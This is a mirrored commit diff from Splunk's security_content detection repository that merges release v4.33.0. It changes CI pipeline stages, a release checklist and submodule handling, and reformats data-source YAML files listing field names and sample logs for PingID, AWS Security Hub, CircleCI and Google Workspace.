mirror of
https://github.com/splunk/security_content
synced 2026-06-08 17:32:49 +00:00
Merge branch 'release_v4.33.0' into 'develop'
Release Branch v4.33.0 See merge request threat-research/security_content!1520
This commit is contained in:
+7
-6
@@ -8,19 +8,20 @@ variables:
|
||||
SKIP_DOWNSTREAM_TESTING:
|
||||
value: "False"
|
||||
description: "If true, downstream testing will be suppressed (useful for debugging or forcing a release in an emergency)."
|
||||
ENABLE_INTEGRATION_TESTING:
|
||||
value: "True"
|
||||
description: "Flag indicating that integration testing should be performed. Defaults to True, may be suppressed in some workflows."
|
||||
|
||||
stages:
|
||||
- validate
|
||||
- generate
|
||||
- test
|
||||
- build
|
||||
- app_inspect
|
||||
- test
|
||||
- release
|
||||
|
||||
include:
|
||||
- local: "pipeline/.validate.yml"
|
||||
- local: "pipeline/.generate.yml"
|
||||
- local: "pipeline/.build.yml"
|
||||
- local: "pipeline/.app-inspect.yml"
|
||||
- local: "pipeline/.test.yml"
|
||||
- local: "pipeline/.app_inspect.yml"
|
||||
- local: "pipeline/.release.yml"
|
||||
- local: "pipeline/.post.yml"
|
||||
|
||||
|
||||
@@ -31,4 +31,8 @@
|
||||
*
|
||||
|
||||
* Are there any detections that we're promoting from validation to production in this package? If we're adding new any detections to help understand the over-firing detections, please indicate those as well
|
||||
*
|
||||
*
|
||||
|
||||
#### Checklist
|
||||
* [ ] Trigger a full-package ESCU integration test and confirm there are no regressions (see manually triggered jobs on the most recent push pipeline)
|
||||
* [ ] Trigger a SSA/BA integration test and confirm there are no regressions (see manually triggered jobs on the most recent push pipeline)
|
||||
|
||||
+6
-4
@@ -1,4 +1,6 @@
|
||||
[submodule "contentctl"]
|
||||
path = contentctl
|
||||
url = https://github.com/splunk/contentctl.git
|
||||
ignore = all
|
||||
# Removing submodule and using pip to install contentctl. Keeping this as a comment to help using submodules for local development
|
||||
|
||||
# [submodule "contentctl"]
|
||||
# path = contentctl
|
||||
# url = https://github.com/splunk/contentctl.git
|
||||
# ignore = all
|
||||
|
||||
-1
Submodule contentctl deleted from a169fee8d7
@@ -3,36 +3,36 @@ id: 17890675-61c1-40bd-a88e-6a8e9e246b43
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: XmlWinEventLog:Security
|
||||
sourcetype: XmlWinEventLog
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- actors{}.name
|
||||
- actors{}.type
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- extracted_source
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- recorded
|
||||
- resources{}.ipaddress
|
||||
- resources{}.websession
|
||||
- result.message
|
||||
- result.status
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log: '{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
|
||||
- _time
|
||||
- actors{}.name
|
||||
- actors{}.type
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- extracted_source
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- recorded
|
||||
- resources{}.ipaddress
|
||||
- resources{}.websession
|
||||
- result.message
|
||||
- result.status
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log:
|
||||
'{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
|
||||
Paired SMS \"Mobile 1\""}}'
|
||||
|
||||
@@ -3,32 +3,32 @@ id: d8a2c791-460b-4756-a8e5-ecade77b21e3
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: splunkd_ui_access.log
|
||||
sourcetype: splunkd_ui_access
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- action
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- host
|
||||
- index
|
||||
- info
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
- user
|
||||
example_log: 'Audit:[timestamp=01-25-2023 22:08:54.818, user=admin, action=search,
|
||||
info=granted REST: /search/jobs/rt_1674684525.24/events]'
|
||||
- _time
|
||||
- action
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- host
|
||||
- index
|
||||
- info
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
- user
|
||||
example_log:
|
||||
"Audit:[timestamp=01-25-2023 22:08:54.818, user=admin, action=search,
|
||||
info=granted REST: /search/jobs/rt_1674684525.24/events]"
|
||||
|
||||
@@ -3,117 +3,117 @@ id: b02bfbf3-294f-478e-99a1-e24b8c692d7e
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: aws_securityhub_finding
|
||||
sourcetype: aws:securityhub:finding
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk Add-on for Amazon Web Services (AWS)
|
||||
version: 7.4.1
|
||||
url: https://splunkbase.splunk.com/app/1876
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- AwsAccountId
|
||||
- CreatedAt
|
||||
- Description
|
||||
- FirstObservedAt
|
||||
- GeneratorId
|
||||
- Id
|
||||
- LastObservedAt
|
||||
- ProductArn
|
||||
- ProductFields.aws/guardduty/service/action/actionType
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/api
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
|
||||
- ProductFields.aws/guardduty/service/additionalInfo/sample
|
||||
- ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
|
||||
- ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
|
||||
- ProductFields.aws/guardduty/service/archived
|
||||
- ProductFields.aws/guardduty/service/count
|
||||
- ProductFields.aws/guardduty/service/detectorId
|
||||
- ProductFields.aws/guardduty/service/eventFirstSeen
|
||||
- ProductFields.aws/guardduty/service/eventLastSeen
|
||||
- ProductFields.aws/guardduty/service/resourceRole
|
||||
- ProductFields.aws/guardduty/service/serviceName
|
||||
- ProductFields.aws/securityhub/CompanyName
|
||||
- ProductFields.aws/securityhub/FindingId
|
||||
- ProductFields.aws/securityhub/ProductName
|
||||
- RecordState
|
||||
- Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
|
||||
- Resources{}.Details.AwsEc2Instance.ImageId
|
||||
- Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
|
||||
- Resources{}.Details.AwsEc2Instance.LaunchedAt
|
||||
- Resources{}.Details.AwsEc2Instance.SubnetId
|
||||
- Resources{}.Details.AwsEc2Instance.Type
|
||||
- Resources{}.Details.AwsEc2Instance.VpcId
|
||||
- Resources{}.Details.AwsIamAccessKey.PrincipalId
|
||||
- Resources{}.Details.AwsIamAccessKey.PrincipalName
|
||||
- Resources{}.Details.AwsIamAccessKey.PrincipalType
|
||||
- Resources{}.Details.AwsS3Bucket.CreatedAt
|
||||
- Resources{}.Details.AwsS3Bucket.OwnerId
|
||||
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
|
||||
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
|
||||
- Resources{}.Id
|
||||
- Resources{}.Partition
|
||||
- Resources{}.Region
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag1
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag2
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag3
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag4
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag5
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag6
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag7
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag8
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag9
|
||||
- Resources{}.Tags.foo
|
||||
- Resources{}.Type
|
||||
- SchemaVersion
|
||||
- Severity.Label
|
||||
- Severity.Normalized
|
||||
- Severity.Product
|
||||
- SourceUrl
|
||||
- Title
|
||||
- Types{}
|
||||
- UpdatedAt
|
||||
- Workflow.Status
|
||||
- WorkflowState
|
||||
- accesskey_extract
|
||||
- app
|
||||
- body
|
||||
- description
|
||||
- dest
|
||||
- dest_type
|
||||
- eventtype
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- instance_extract
|
||||
- linecount
|
||||
- punct
|
||||
- s3bucket_extract
|
||||
- severity
|
||||
- severity_id
|
||||
- signature
|
||||
- signature_id
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- subject
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- type
|
||||
- vendor_account
|
||||
- vendor_region
|
||||
example_log: '{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
|
||||
- _time
|
||||
- AwsAccountId
|
||||
- CreatedAt
|
||||
- Description
|
||||
- FirstObservedAt
|
||||
- GeneratorId
|
||||
- Id
|
||||
- LastObservedAt
|
||||
- ProductArn
|
||||
- ProductFields.aws/guardduty/service/action/actionType
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/api
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
|
||||
- ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
|
||||
- ProductFields.aws/guardduty/service/additionalInfo/sample
|
||||
- ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
|
||||
- ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
|
||||
- ProductFields.aws/guardduty/service/archived
|
||||
- ProductFields.aws/guardduty/service/count
|
||||
- ProductFields.aws/guardduty/service/detectorId
|
||||
- ProductFields.aws/guardduty/service/eventFirstSeen
|
||||
- ProductFields.aws/guardduty/service/eventLastSeen
|
||||
- ProductFields.aws/guardduty/service/resourceRole
|
||||
- ProductFields.aws/guardduty/service/serviceName
|
||||
- ProductFields.aws/securityhub/CompanyName
|
||||
- ProductFields.aws/securityhub/FindingId
|
||||
- ProductFields.aws/securityhub/ProductName
|
||||
- RecordState
|
||||
- Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
|
||||
- Resources{}.Details.AwsEc2Instance.ImageId
|
||||
- Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
|
||||
- Resources{}.Details.AwsEc2Instance.LaunchedAt
|
||||
- Resources{}.Details.AwsEc2Instance.SubnetId
|
||||
- Resources{}.Details.AwsEc2Instance.Type
|
||||
- Resources{}.Details.AwsEc2Instance.VpcId
|
||||
- Resources{}.Details.AwsIamAccessKey.PrincipalId
|
||||
- Resources{}.Details.AwsIamAccessKey.PrincipalName
|
||||
- Resources{}.Details.AwsIamAccessKey.PrincipalType
|
||||
- Resources{}.Details.AwsS3Bucket.CreatedAt
|
||||
- Resources{}.Details.AwsS3Bucket.OwnerId
|
||||
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
|
||||
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
|
||||
- Resources{}.Id
|
||||
- Resources{}.Partition
|
||||
- Resources{}.Region
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag1
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag2
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag3
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag4
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag5
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag6
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag7
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag8
|
||||
- Resources{}.Tags.GeneratedFindingInstaceTag9
|
||||
- Resources{}.Tags.foo
|
||||
- Resources{}.Type
|
||||
- SchemaVersion
|
||||
- Severity.Label
|
||||
- Severity.Normalized
|
||||
- Severity.Product
|
||||
- SourceUrl
|
||||
- Title
|
||||
- Types{}
|
||||
- UpdatedAt
|
||||
- Workflow.Status
|
||||
- WorkflowState
|
||||
- accesskey_extract
|
||||
- app
|
||||
- body
|
||||
- description
|
||||
- dest
|
||||
- dest_type
|
||||
- eventtype
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- instance_extract
|
||||
- linecount
|
||||
- punct
|
||||
- s3bucket_extract
|
||||
- severity
|
||||
- severity_id
|
||||
- signature
|
||||
- signature_id
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- subject
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- type
|
||||
- vendor_account
|
||||
- vendor_region
|
||||
example_log:
|
||||
'{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
|
||||
and Configuration Checks/Exfiltration:S3.ObjectRead.Unusual"],"SourceUrl":"https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=6aba6b696aea10606e8b336f68d98819","Description":"Principal
|
||||
GeneratedFindingUserName read objects from S3 bucket GeneratedFindingS3Bucket in
|
||||
an unusual way.","SchemaVersion":"2018-10-08","GeneratorId":"arn:aws:guardduty:us-east-1:802684071507:detector/48ba636359b884eb132865311fdeb317","FirstObservedAt":"2020-09-28T22:26:15.636Z","CreatedAt":"2020-09-28T22:26:15.636Z","RecordState":"ACTIVE","Title":"Unusual
|
||||
|
||||
@@ -3,66 +3,66 @@ id: 34ad06fc-a296-4ab5-8315-2f07714948e3
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: circleci
|
||||
sourcetype: circleci
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: App for CircleCI
|
||||
version: 0.1.1
|
||||
url: https://splunkbase.splunk.com/app/5162
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- author_name
|
||||
- avatar_url
|
||||
- branch
|
||||
- build_num
|
||||
- build_time_millis
|
||||
- build_url
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- eventtype
|
||||
- fail_reason
|
||||
- host
|
||||
- index
|
||||
- job_name
|
||||
- job_time
|
||||
- linecount
|
||||
- owners{}
|
||||
- project_slug
|
||||
- punct
|
||||
- queued_time
|
||||
- reponame
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- start_time
|
||||
- status
|
||||
- stop_time
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timedout
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- username
|
||||
- vcs.commit_time
|
||||
- vcs.committer_name
|
||||
- vcs.revision
|
||||
- vcs.subject
|
||||
- vcs.tag
|
||||
- vcs.type
|
||||
- vcs.url
|
||||
- workflows.job_id
|
||||
- workflows.job_name
|
||||
- workflows.upstream_job_ids{}
|
||||
- workflows.workflow_id
|
||||
- workflows.workflow_name
|
||||
- workflows.workspace_id
|
||||
example_log: '{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
|
||||
- _time
|
||||
- author_name
|
||||
- avatar_url
|
||||
- branch
|
||||
- build_num
|
||||
- build_time_millis
|
||||
- build_url
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- eventtype
|
||||
- fail_reason
|
||||
- host
|
||||
- index
|
||||
- job_name
|
||||
- job_time
|
||||
- linecount
|
||||
- owners{}
|
||||
- project_slug
|
||||
- punct
|
||||
- queued_time
|
||||
- reponame
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- start_time
|
||||
- status
|
||||
- stop_time
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timedout
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- username
|
||||
- vcs.commit_time
|
||||
- vcs.committer_name
|
||||
- vcs.revision
|
||||
- vcs.subject
|
||||
- vcs.tag
|
||||
- vcs.type
|
||||
- vcs.url
|
||||
- workflows.job_id
|
||||
- workflows.job_name
|
||||
- workflows.upstream_job_ids{}
|
||||
- workflows.workflow_id
|
||||
- workflows.workflow_name
|
||||
- workflows.workspace_id
|
||||
example_log:
|
||||
'{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
|
||||
"start_time": "2021-09-02T08:10:15.829Z", "queued_time": "2021-09-02T08:10:12.764Z",
|
||||
"job_name": "Unknown", "reponame": "devsecops_poc", "build_num": 94, "build_url":
|
||||
"https://circleci.com/gh/splunk/devsecops_poc/94", "branch": "main", "status": "success",
|
||||
|
||||
@@ -3,45 +3,45 @@ id: 5f79120f-a235-4468-bd0d-55203758ac22
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: http:gsuite
|
||||
sourcetype: gsuite:drive:json
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk Add-on for Google Workspace
|
||||
version: 2.6.3
|
||||
url: https://splunkbase.splunk.com/app/5556
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- email
|
||||
- host
|
||||
- index
|
||||
- ip_address
|
||||
- linecount
|
||||
- name
|
||||
- parameters.actor_is_collaborator_account
|
||||
- parameters.billable
|
||||
- parameters.doc_id
|
||||
- parameters.doc_title
|
||||
- parameters.doc_type
|
||||
- parameters.is_encrypted
|
||||
- parameters.new_value{}
|
||||
- parameters.old_value{}
|
||||
- parameters.old_visibility
|
||||
- parameters.originating_app_id
|
||||
- parameters.owner
|
||||
- parameters.owner_is_shared_drive
|
||||
- parameters.owner_is_team_drive
|
||||
- parameters.primary_event
|
||||
- parameters.target_user
|
||||
- parameters.visibility
|
||||
- parameters.visibility_change
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timestamp
|
||||
- type
|
||||
- unique_id
|
||||
example_log: '{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
|
||||
- _time
|
||||
- email
|
||||
- host
|
||||
- index
|
||||
- ip_address
|
||||
- linecount
|
||||
- name
|
||||
- parameters.actor_is_collaborator_account
|
||||
- parameters.billable
|
||||
- parameters.doc_id
|
||||
- parameters.doc_title
|
||||
- parameters.doc_type
|
||||
- parameters.is_encrypted
|
||||
- parameters.new_value{}
|
||||
- parameters.old_value{}
|
||||
- parameters.old_visibility
|
||||
- parameters.originating_app_id
|
||||
- parameters.owner
|
||||
- parameters.owner_is_shared_drive
|
||||
- parameters.owner_is_team_drive
|
||||
- parameters.primary_event
|
||||
- parameters.target_user
|
||||
- parameters.visibility
|
||||
- parameters.visibility_change
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timestamp
|
||||
- type
|
||||
- unique_id
|
||||
example_log:
|
||||
'{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
|
||||
true, "billable": true, "visibility_change": "none", "target_user": "alberto@internal_test_email.com",
|
||||
"old_value": ["none"], "new_value": ["can_edit"], "old_visibility": "private", "doc_id":
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "doc_type": "spreadsheet", "is_encrypted":
|
||||
|
||||
@@ -3,84 +3,84 @@ id: 706c3978-41de-406b-b6e0-75bd01e12a5d
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: http:gsuite
|
||||
sourcetype: gsuite:gmail:bigquery
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk Add-on for Google Workspace
|
||||
version: 2.6.3
|
||||
url: https://splunkbase.splunk.com/app/5556
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- action_type
|
||||
- attachment{}.file_extension_type
|
||||
- attachment{}.malware_family
|
||||
- attachment{}.sha256
|
||||
- connection_info.authenticated_domain{}.name
|
||||
- connection_info.authenticated_domain{}.type
|
||||
- connection_info.client_host_zone
|
||||
- connection_info.client_ip
|
||||
- connection_info.dkim_pass
|
||||
- connection_info.dmarc_pass
|
||||
- connection_info.dmarc_published_domain
|
||||
- connection_info.ip_geo_city
|
||||
- connection_info.ip_geo_country
|
||||
- connection_info.is_internal
|
||||
- connection_info.is_intra_domain
|
||||
- connection_info.smtp_in_connect_ip
|
||||
- connection_info.smtp_out_connect_ip
|
||||
- connection_info.smtp_out_remote_host
|
||||
- connection_info.smtp_reply_code
|
||||
- connection_info.smtp_response_reason
|
||||
- connection_info.smtp_tls_cipher
|
||||
- connection_info.smtp_tls_state
|
||||
- connection_info.smtp_tls_version
|
||||
- connection_info.smtp_user_agent_ip
|
||||
- connection_info.spf_pass
|
||||
- connection_info.tls_required_but_unavailable
|
||||
- description
|
||||
- destination{}.address
|
||||
- destination{}.rcpt_response
|
||||
- destination{}.selector
|
||||
- destination{}.service
|
||||
- destination{}.smime_decryption_success
|
||||
- destination{}.smime_extraction_success
|
||||
- destination{}.smime_parsing_success
|
||||
- destination{}.smime_signature_verification_success
|
||||
- eventtype
|
||||
- flattened_destinations
|
||||
- flattened_triggered_rule_info
|
||||
- host
|
||||
- index
|
||||
- is_policy_check_for_sender
|
||||
- is_spam
|
||||
- linecount
|
||||
- message_set{}.type
|
||||
- num_message_attachments
|
||||
- payload_size
|
||||
- punct
|
||||
- rfc2822_message_id
|
||||
- smime_content_type
|
||||
- smime_encrypt_message
|
||||
- smime_extraction_success
|
||||
- smime_packaging_success
|
||||
- smime_sign_message
|
||||
- smtp_relay_error
|
||||
- source
|
||||
- source.address
|
||||
- source.from_header_address
|
||||
- source.from_header_displayname
|
||||
- source.selector
|
||||
- source.service
|
||||
- sourcetype
|
||||
- spam_info
|
||||
- splunk_server
|
||||
- structured_policy_log_info
|
||||
- subject
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- upload_error_category
|
||||
example_log: '{"action_type": 10, "rfc2822_message_id": "<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC@mail.gmail.com>",
|
||||
- _time
|
||||
- action_type
|
||||
- attachment{}.file_extension_type
|
||||
- attachment{}.malware_family
|
||||
- attachment{}.sha256
|
||||
- connection_info.authenticated_domain{}.name
|
||||
- connection_info.authenticated_domain{}.type
|
||||
- connection_info.client_host_zone
|
||||
- connection_info.client_ip
|
||||
- connection_info.dkim_pass
|
||||
- connection_info.dmarc_pass
|
||||
- connection_info.dmarc_published_domain
|
||||
- connection_info.ip_geo_city
|
||||
- connection_info.ip_geo_country
|
||||
- connection_info.is_internal
|
||||
- connection_info.is_intra_domain
|
||||
- connection_info.smtp_in_connect_ip
|
||||
- connection_info.smtp_out_connect_ip
|
||||
- connection_info.smtp_out_remote_host
|
||||
- connection_info.smtp_reply_code
|
||||
- connection_info.smtp_response_reason
|
||||
- connection_info.smtp_tls_cipher
|
||||
- connection_info.smtp_tls_state
|
||||
- connection_info.smtp_tls_version
|
||||
- connection_info.smtp_user_agent_ip
|
||||
- connection_info.spf_pass
|
||||
- connection_info.tls_required_but_unavailable
|
||||
- description
|
||||
- destination{}.address
|
||||
- destination{}.rcpt_response
|
||||
- destination{}.selector
|
||||
- destination{}.service
|
||||
- destination{}.smime_decryption_success
|
||||
- destination{}.smime_extraction_success
|
||||
- destination{}.smime_parsing_success
|
||||
- destination{}.smime_signature_verification_success
|
||||
- eventtype
|
||||
- flattened_destinations
|
||||
- flattened_triggered_rule_info
|
||||
- host
|
||||
- index
|
||||
- is_policy_check_for_sender
|
||||
- is_spam
|
||||
- linecount
|
||||
- message_set{}.type
|
||||
- num_message_attachments
|
||||
- payload_size
|
||||
- punct
|
||||
- rfc2822_message_id
|
||||
- smime_content_type
|
||||
- smime_encrypt_message
|
||||
- smime_extraction_success
|
||||
- smime_packaging_success
|
||||
- smime_sign_message
|
||||
- smtp_relay_error
|
||||
- source
|
||||
- source.address
|
||||
- source.from_header_address
|
||||
- source.from_header_displayname
|
||||
- source.selector
|
||||
- source.service
|
||||
- sourcetype
|
||||
- spam_info
|
||||
- splunk_server
|
||||
- structured_policy_log_info
|
||||
- subject
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- upload_error_category
|
||||
example_log:
|
||||
'{"action_type": 10, "rfc2822_message_id": "<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC@mail.gmail.com>",
|
||||
"subject": "New Order DHL0000001 - Dummy email for Detection Development", "payload_size":
|
||||
6733, "source": {"address": "john@external_test_email.com", "service": "gmail-for-work",
|
||||
"selector": "policy", "from_header_address": "john@external_test_email.com", "from_header_displayname":
|
||||
|
||||
+191
-191
@@ -3,203 +3,203 @@ id: 88aa4632-3c3e-43f6-a00a-998d71f558e3
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: github
|
||||
sourcetype: aws:firehose:json
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk Add-on for Github
|
||||
version: 2.2.1
|
||||
url: https://splunkbase.splunk.com/app/6254
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- action
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- meta
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timestamp
|
||||
- workflow_run.actor.avatar_url
|
||||
- workflow_run.actor.events_url
|
||||
- workflow_run.actor.followers_url
|
||||
- workflow_run.actor.following_url
|
||||
- workflow_run.actor.gists_url
|
||||
- workflow_run.actor.gravatar_id
|
||||
- workflow_run.actor.html_url
|
||||
- workflow_run.actor.id
|
||||
- workflow_run.actor.login
|
||||
- workflow_run.actor.node_id
|
||||
- workflow_run.actor.organizations_url
|
||||
- workflow_run.actor.received_events_url
|
||||
- workflow_run.actor.repos_url
|
||||
- workflow_run.actor.site_admin
|
||||
- workflow_run.actor.starred_url
|
||||
- workflow_run.actor.subscriptions_url
|
||||
- workflow_run.actor.type
|
||||
- workflow_run.actor.url
|
||||
- workflow_run.artifacts_url
|
||||
- workflow_run.cancel_url
|
||||
- workflow_run.check_suite_id
|
||||
- workflow_run.check_suite_node_id
|
||||
- workflow_run.check_suite_url
|
||||
- workflow_run.conclusion
|
||||
- workflow_run.created_at
|
||||
- workflow_run.event
|
||||
